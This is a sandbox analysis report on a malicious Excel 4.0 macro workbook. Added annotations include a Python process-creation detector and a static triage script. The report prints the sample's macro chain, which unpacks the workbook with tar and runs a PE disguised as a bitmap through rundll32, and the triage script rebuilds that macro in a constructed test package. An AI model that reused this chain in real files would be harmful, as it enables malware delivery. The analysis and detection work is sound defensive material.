Analysis Report f9309eba_by_Libranalysis
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security | |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files)
Source: | File created: | (dropped file) |
Networking: |
---|
Yara detected MalDoc1
Source: | File source: |
Source: | File created: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: | Screenshot OCR: | (5 matches; recognised text not captured) |
Found Excel 4.0 Macro with suspicious formulas
Source: | Initial sample: |
Office process drops PE file
Source: | File created: | (dropped file) |
Source: | Binary string: |
Source: | Static PE information: | (8 entries; values not captured) |
Source: | Window title found: |
Source: | Classification label: |
Source: | File created: |
Source: | File created: |
Source: | File read: |
Source: | Window detected: |
Source: | Initial sample: | (3 entries; values not captured) |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | File created: | (dropped file) |
Source: | File created: | (dropped file) |
Source: | Process information set: | (29 entries; values not captured) |
Malware Analysis System Evasion: |
---|
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: | Binary or memory string: | (2 entries; strings not captured) |
Source: | Dropped PE file which has not been started: | (dropped file) |
Mitre Att&ck Matrix |
---|
Only the techniques carrying a trailing signature count (Scripting, Exploitation for Client Execution, Masquerading, Disable or Modify Tools, Security Software Discovery, File and Directory Discovery, System Information Discovery, Ingress Tool Transfer) were mapped from this analysis; the other cells are the unpopulated matrix template, not findings.
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading11 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | System Information Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
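The Execution and Masquerading cells above correspond to the part of this chain that process-creation telemetry can see: an Office process launching an archiver, and a rundll32 stage pointed at a file with an image extension (the command the concatenated cells in the Macro 4.0 Code section build). The detector below is an added example written for this report, not Joe Sandbox or Sigma code. Its events are constructed to resemble Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the LOLBin list and the `.cpl` allowance are assumptions to tune against your own baseline, and the rundll32 command line is the one the macro appears to assemble, not a line the sandbox observed.

```python
"""Process-creation detection for the Execution and Masquerading cells of the matrix.

Added example for this report; not Joe Sandbox or Sigma code. Events are
constructed to resemble Sysmon Event ID 1 fields (Image, ParentImage,
CommandLine). The LOLBin list and the .cpl allowance are assumptions to tune.
"""
import ntpath
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Children an Office process has no business spawning: archivers, script hosts, LOLBins.
LOLBINS = {"tar.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe", "cmd.exe",
           "powershell.exe", "wscript.exe", "cscript.exe", "certutil.exe"}
# rundll32 may legitimately load control panel applets; any other extension is a masquerade.
RUNDLL32_OK_EXT = {".dll", ".cpl"}


def _token(s, stop_at_comma=False):
    """Pop one Windows-style token: double-quoted, or up to whitespace (and a comma for modules)."""
    s = s.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:end], s[end + 1:]) if end != -1 else (s[1:], "")
    m = re.match(r"[^\s,]+" if stop_at_comma else r"\S+", s)
    return (s[:m.end()], s[m.end():]) if m else ("", "")


def rundll32_module(cmdline):
    """Path rundll32 was told to load: the second token, cut at the ',EntryPoint' comma."""
    _, rest = _token(cmdline)  # discard rundll32[.exe] itself, quoted or not
    module, _ = _token(rest, stop_at_comma=True)
    return module


def detect(events):
    """Return (event index, rule name) pairs for every rule an event trips."""
    hits = []
    for i, ev in enumerate(events):
        image = ntpath.basename(ev["Image"]).lower()
        parent = ntpath.basename(ev["ParentImage"]).lower()
        if parent in OFFICE and image in LOLBINS:
            hits.append((i, "office_child_process"))
        if image == "rundll32.exe":
            ext = ntpath.splitext(rundll32_module(ev["CommandLine"]))[1].lower()
            if ext not in RUNDLL32_OK_EXT:
                hits.append((i, "rundll32_nondll_module"))
    return hits


# Constructed events, not sandbox output. Indices 1 and 2 follow the macro chain in this report;
# index 2 is the command the concatenated cells build, which the sandbox itself did not observe.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" invoice.xlsx'},
    {"Image": r"C:\Windows\System32\tar.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": "tar -xf ..\\Nioka.meposv -C ..\\"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": r"rundll32 ..\xl\media\image2.bmp,StartW"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" "C:\Users\victim\AppData\Local\Temp\x.bmp",StartW'},
]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The two rules are deliberately independent: the parent-child rule fires on the tar stage even on a host where the rundll32 stage never runs, and the module-extension rule fires on rundll32 loading a non-DLL regardless of who spawned it (event 4 is such a case with a quoted path). Pair them with a file-creation rule for Office processes writing MZ-headed files outside their temp directories if your telemetry carries file hashes.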
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 412464 |
Start date: | 12.05.2021 |
Start time: | 18:01:52 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 37s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | f9309eba_by_Libranalysis (renamed file extension from none to xlsx) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 2 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.troj.expl.evad.winXLSX@1/10@0/0 (score 72 with trojan, exploit and evasion tags on a Windows XLSX sample; 1 process and 10 dropped files; 0 domains and 0 IPs, which matches the ten entries under Created / dropped Files and the empty Network Behavior section) |
Cookbook Comments: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
All ten entries below were written by EXCEL.EXE; paths and file types were not captured. The 609397-byte entry (SHA-256 BC782FC4D49A2B97F78C0E82ECAF196931EA410A41D0C6DFECF1D4BF1DD54B14) appears twice, and the 647168-byte entry is the only one the sandbox marks as malicious.
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185386 |
Entropy (8bit): | 7.326521161282199 |
Encrypted: | false |
SSDEEP: | 3072:0LQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57do:0Lex0VAIu4bVYeVHrK5AySfahk8 |
MD5: | A6E3680B30CEC6746291E55B7D9B6975 |
SHA1: | E45C3A057F840EF4C96AB8233E1E21700BBDA199 |
SHA-256: | 89934494B26BCA1A6B28C2D262392548FA12CEBDF648E5F2DCD793CBF71FB261 |
SHA-512: | FD0DE48198B51F437ADFFC5A0F12880334047D177E67D92199EFEF09F697FC0771D738B28E47EAB17FD52A772AE74CEAFABFD0F7253C526B86D5ADD4912F712B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 647168 |
Entropy (8bit): | 6.903949816811106 |
Encrypted: | false |
SSDEEP: | 12288:uRgaHm2fjIxEh+bLlmTlEPMx4rBjVXmePxfH3KYypHKlA:2gim2fMOh+mF4NUmKYy0lA |
MD5: | C77E025AB5500D3A00B86265C73CC0B3 |
SHA1: | 83B5715406E67F33E0030C2F17991A4D4BE2CBE5 |
SHA-256: | D1FD867DD79BB803974E18598BDC97CBB8F51ACFFEB8739CE2F01DFF29985803 |
SHA-512: | BCB03E9EA06A3957D3D9C032BC10B93443ED76E102FDB147B0414BA0D60F57FFD429D5B42B8878A70D1AC5A79AF9E6F8B635574E7731D3AB9BB8248CF43A8DC3 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609627 |
Entropy (8bit): | 7.892549105768549 |
Encrypted: | false |
SSDEEP: | 12288:jpex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHKv:4KVbLte52a2GZFGaycOucCsGqav |
MD5: | D9FC10EA36D4BD7EE29B775CEFB677D4 |
SHA1: | 32733A2CEB144009B9013CB5D0154D202A530CEC |
SHA-256: | 047A14782F44F5AC826549CC1FB32651716A7C61E49C6A97EBA44A51F7FF5210 |
SHA-512: | F2CDD1B47DCA6048E08B44C8B5F838581293E25413F4935F7C1404634EE4E0C8B50751CD6D79736BA3B90B04FB2978DFA56726E2CFD5D25C9023AB6D24CE2A83 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.48645134363762 |
Encrypted: | false |
SSDEEP: | 12:85QdVLgXg/XAlCPCHaX2B8GB/4lX+Wnicvbf+bDtZ3YilMMEpxRljKITdJP9TdJ2:85uv/XTm6GoYeWDv3qhrNru/ |
MD5: | 46E3FA1B706BE93C1A206C7BDC3EDAB4 |
SHA1: | 4DA0C6FFFCD87ADA72D386A5D201BBD9BB0E4E71 |
SHA-256: | 1003FC597568E74F2E71E02DA51F7A63651BB22071B6558C1A18A807B9CAF08B |
SHA-512: | 91FFD9CFDA7A665192027D8742B6282773C35AAF3E8A2F0E400C207FC3727B52A79422A304B4CC12FB01DB87718F6D8E2AD0A5580C08390D997A27DE8663DBAC |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 4.55521119286082 |
Encrypted: | false |
SSDEEP: | 48:8hU/XTFG5uOENrIN0OEyhQh2hU/XTFG5uOENrIN0OEyhQ/:8hU/XJG5uFCN0FyhQh2hU/XJG5uFCN0B |
MD5: | 8214CA5707AEB03E8465010483F0DD75 |
SHA1: | F54A80AB40E792AFA125CD162332A56AEFAD2D86 |
SHA-256: | 7A7943A9B6DEA376227196E29323B68F3655056020BD50599E9E9CC3B1C9DF66 |
SHA-512: | 0948BC6D7FB55981C5C4498017E7EBFF730911F257DCBF86A1EF7472F478CF5D2BFA2C6190EF9A504414A7C5FA80F195B5854206573F7F91A34F62EE2D0A2E9E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127 |
Entropy (8bit): | 4.64054093495956 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWInnHLoUwSLMp6lbnHLoUwSLMp6lmxWInnHLoUwSLMp6lv:dj7n7Nrn7NYn7Nf |
MD5: | C2092C2708F633B3014F688B01F8FDF2 |
SHA1: | B716B7F1FD7E81FE6A04EB388DEDBBA6915BEAC2 |
SHA-256: | 289C9CB8C053EE337E04F09158FD6029F357127A83180474F9E3147D6A0AD11A |
SHA-512: | CCB1A0CEE5C0AB7A63E9EDDFE1F0779AE45CB400C86469FC1CB37624FDAEDEF53B984DDBD6B8171F941710D7BA15AC090CC9A0AA64B1A879FAAD7C243990D14A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609397 |
Entropy (8bit): | 7.892473412644939 |
Encrypted: | false |
SSDEEP: | 12288:epex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHK7:hKVbLte52a2GZFGaycOucCsGqa7 |
MD5: | AAE50936F6891FF5E29E763BCA5F70B8 |
SHA1: | 69D6BCF23FAAB068CF84B24F8784A207DACF46AD |
SHA-256: | BC782FC4D49A2B97F78C0E82ECAF196931EA410A41D0C6DFECF1D4BF1DD54B14 |
SHA-512: | 283EF66BA6A5864F49B335B36E91A6BC316CDB688FA2FFD56E0E9D4192C325F998B28FAF4D80ED3DD2CA98E7A0B27D88C49DD8FEB4845F78B8E9CC8855EE0697 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 609397 |
Entropy (8bit): | 7.892473412644939 |
Encrypted: | false |
SSDEEP: | 12288:epex0VbLbGeH+59Sja2NwZFGr9Q4ZYe/kysnOOBHVlsy3xZlHsGqXHK7:hKVbLte52a2GZFGaycOucCsGqa7 |
MD5: | AAE50936F6891FF5E29E763BCA5F70B8 |
SHA1: | 69D6BCF23FAAB068CF84B24F8784A207DACF46AD |
SHA-256: | BC782FC4D49A2B97F78C0E82ECAF196931EA410A41D0C6DFECF1D4BF1DD54B14 |
SHA-512: | 283EF66BA6A5864F49B335B36E91A6BC316CDB688FA2FFD56E0E9D4192C325F998B28FAF4D80ED3DD2CA98E7A0B27D88C49DD8FEB4845F78B8E9CC8855EE0697 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General |
---|
File type: | |
Entropy (8bit): | 7.891709774410967 |
TrID: | |
File name: | f9309eba_by_Libranalysis.xlsx |
File size: | 607568 |
MD5: | f9309ebadd3f4d1e665dfe567dbf9a25 |
SHA1: | 7cd5c8f8038217c20e09fd455fb5708185b151f9 |
SHA256: | 7d2fd957a301aeea8014fd95a0902a6c45a568d34f4a1ce9d7a9fd38b53b542c |
SHA512: | b0a6e900343c7f63cf41d97d75ad9b0db4c63e937cbeec825bb5b6ae168cc34b907abc180ebbcc04104d575497232f79bff3a498bf9468c748f4d21d5670eec3 |
SSDEEP: | 12288:jpex0VbLbGeH+59SjNGst3hglv595+6tLAJVX0cfxBNtsY69bWed0t:jUKVbLte52dt3i/+mAJ2gsY6oe2 |
File Content Preview: | PK..........!.........3.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4b4bcb4 |
Static OLE Info |
---|
General |
---|
Document Type: | OpenXML |
Number of OLE Files: | 1 |
OLE File "f9309eba_by_Libranalysis.xlsx" |
---|
Indicators | |
---|---|
Has Summary Info; Application Name; Encrypted Document; Contains Word Document Stream; Contains Workbook/Book Stream; Contains PowerPoint Document Stream; Contains Visio Document Stream; Contains ObjectPool Stream; Flash Objects Count; Contains VBA Macros | (values not captured) |
Macro 4.0 Code |
---|
The Excel 4.0 (XLM) macro sheet was dumped as a single CSV row. Empty cells are dropped here and the non-empty cells are listed in the order they occur, with the doubled CSV quotes unescaped:

=SAVE.COPY.AS("..\Nioka.meposv")
run
dll32 ..\xl\media\im
=EXEC("tar -xf ..\Nioka.meposv -C ..\")=PI()=PI()=PI()
age2.bmp,StartW
=WAIT(NOW()+"00:00:06")
=PI()=PI()=PI()=EXEC(AL701&AL702&AL703)=PI()=PI()=PI()
=HALT()

Read as a chain (this reading is inferred from the cells; the sandbox does not state it, and the dump gives no cell addresses): SAVE.COPY.AS writes a copy of the open workbook, which is a ZIP package, to ..\Nioka.meposv; EXEC runs tar -xf on that copy one directory up, which unpacks the package's parts, including xl\media\image2.bmp, to disk; WAIT pauses six seconds for the extraction; EXEC(AL701&AL702&AL703) then runs whatever string the three referenced cells hold, and the three bare string cells in the dump ("run", "dll32 ..\xl\media\im", "age2.bmp,StartW") concatenate to rundll32 ..\xl\media\image2.bmp,StartW, i.e. rundll32 loading the "bitmap" as a DLL and calling its StartW export; HALT ends the macro. Splitting the command across cells keeps rundll32 and the file name out of any single string, and the =PI() cells are filler. This fits the rest of the report: "Found Excel 4.0 Macro with suspicious formulas" and "Office process drops PE file" both fire, the only dropped file marked malicious (647168 bytes, SHA-256 D1FD867DD79BB803974E18598BDC97CBB8F51ACFFEB8739CE2F01DFF29985803) is the PE, and the 609397- and 609627-byte drops share the sample's entropy (7.89) and size range as the SAVE.COPY.AS copies would. Two caveats for anyone reproducing this: the dropped PE was never started and no network activity was seen, and the analysis VM is Windows 7 SP1 with Office 2010, where tar.exe is not present (it ships with Windows 10 from build 17063), so the EXEC("tar ...") stage cannot run as written there. Re-detonate on a current Windows 10 or 11 image before concluding the second stage is inert.
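As an added example (not Joe Sandbox code and not the sample's own code), the following Python script performs the static checks that surface this chain without detonation: it lists XLM macro sheets, hidden or veryHidden sheets, media parts that begin with an MZ header, and formulas calling EXEC, CALL, REGISTER, FORMULA, SAVE.COPY.AS, WAIT or HALT, and it splices `&`-concatenated cell references back into the command they build. The package it runs on is constructed inline to mirror the dump above; placing the string fragments at AL701:AL703 is an assumption about the real sheet (the report gives no cell addresses), and the `image2.bmp` entry is a 64-byte MZ stub rather than a real binary. Shared-string cells (sharedStrings.xml) are not resolved.

```python
"""Static triage of an OOXML workbook for Excel 4.0 (XLM) macro abuse.

Added example for this report; not Joe Sandbox code and not the sample's code.
Assumes the standard OOXML layout (xl/workbook.xml, xl/macrosheets/*.xml,
xl/media/*) and reads inline/plain string cells only (no sharedStrings.xml).
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
XM = "http://schemas.microsoft.com/office/excel/2006/main"
NS = {"m": MAIN}
# XLM functions that run code, write files or steer control flow.
SUSPICIOUS = re.compile(r"\b(EXEC|CALL|REGISTER|FORMULA(?:\.FILL)?|SAVE\.COPY\.AS|WAIT|HALT)\(")
CELL_REF = re.compile(r"^[A-Z]{1,3}[0-9]{1,7}$")


def resolve_concat(formula, cells):
    """If a formula's only argument is A1&B2&... of plain cell refs, splice the cell text in."""
    m = re.match(r"^([A-Z.]+)\((.*)\)$", formula)
    if not m:
        return formula
    func, parts = m.group(1), [p.strip() for p in m.group(2).split("&")]
    if len(parts) < 2 or not all(CELL_REF.match(p) for p in parts):
        return formula
    joined = "".join(cells.get(p, (None, ""))[1] for p in parts)
    return f'{func}("{joined}")'


def triage(package: bytes) -> dict:
    """Return macro sheets, hidden sheets, MZ-headed media parts and suspicious formulas."""
    out = {"macrosheets": [], "hidden_sheets": [], "pe_in_media": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        names = z.namelist()
        out["macrosheets"] = sorted(n for n in names if n.startswith("xl/macrosheets/"))
        if "xl/workbook.xml" in names:
            for s in ET.fromstring(z.read("xl/workbook.xml")).iterfind(".//m:sheet", NS):
                if s.get("state") in ("hidden", "veryHidden"):
                    out["hidden_sheets"].append((s.get("name"), s.get("state")))
        # A PE parked under xl/media/ as an "image" still starts with MZ, whatever its extension.
        out["pe_in_media"] = sorted(n for n in names
                                    if n.startswith("xl/media/") and z.read(n)[:2] == b"MZ")
        for sheet in out["macrosheets"]:
            cells = {}  # address -> (formula or None, string value)
            for c in ET.fromstring(z.read(sheet)).iterfind(".//m:c", NS):
                f, v, t = c.find("m:f", NS), c.find("m:v", NS), c.find("m:is/m:t", NS)
                text = t.text if t is not None else (v.text if v is not None else "")
                cells[c.get("r")] = (f.text if f is not None else None, text or "")
            for addr, (formula, _) in cells.items():
                if formula and SUSPICIOUS.search(formula.upper()):
                    out["suspicious"].append({"sheet": sheet, "cell": addr, "formula": formula,
                                              "resolved": resolve_concat(formula, cells)})
    return out


def build_sample() -> bytes:
    """Constructed package mirroring the report's macro dump; NOT the real sample.
    Cell addresses AL701:AL703 for the string fragments are an assumption."""
    def cell(ref, formula=None, text=None):
        if formula is not None:
            return f'<c r="{ref}"><f>{formula}</f></c>'
        return f'<c r="{ref}" t="inlineStr"><is><t>{text}</t></is></c>'
    cells = [
        cell("A1", formula='SAVE.COPY.AS("..\\Nioka.meposv")'),
        cell("A2", formula='EXEC("tar -xf ..\\Nioka.meposv -C ..\\")'),
        cell("A3", formula='WAIT(NOW()+"00:00:06")'),
        cell("A4", formula="EXEC(AL701&amp;AL702&amp;AL703)"),  # & escaped for XML
        cell("A5", formula="HALT()"),
        cell("AL701", text="run"),
        cell("AL702", text="dll32 ..\\xl\\media\\im"),
        cell("AL703", text="age2.bmp,StartW"),
    ]
    macro = (f'<xm:macrosheet xmlns="{MAIN}" xmlns:xm="{XM}"><sheetData>'
             + "".join(f'<row r="{i}">{c}</row>' for i, c in enumerate(cells, 1))
             + "</sheetData></xm:macrosheet>")
    workbook = (f'<workbook xmlns="{MAIN}"><sheets><sheet name="Sheet1" sheetId="1"/>'
                '<sheet name="Macro1" sheetId="2" state="veryHidden"/></sheets></workbook>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/macrosheets/sheet1.xml", macro)
        z.writestr("xl/media/image1.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)  # genuine image header
        z.writestr("xl/media/image2.bmp", b"MZ" + b"\x00" * 62)  # 64-byte MZ stub, not a runnable PE
    return buf.getvalue()


if __name__ == "__main__":
    for hit in triage(build_sample())["suspicious"]:
        print(hit["cell"], hit["resolved"])
```

Run it on a real file with `triage(open(path, "rb").read())`. A veryHidden macro sheet plus an MZ-headed part under xl/media/ is already a strong verdict on its own; the `resolved` field turns the split `EXEC(AL701&AL702&AL703)` into the rundll32 line so the module path and export name can be used as indicators without waiting for a sandbox run.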
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
System Behavior |
---|
General |
---|
Start time: | 18:02:42 |
Start date: | 12/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f930000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|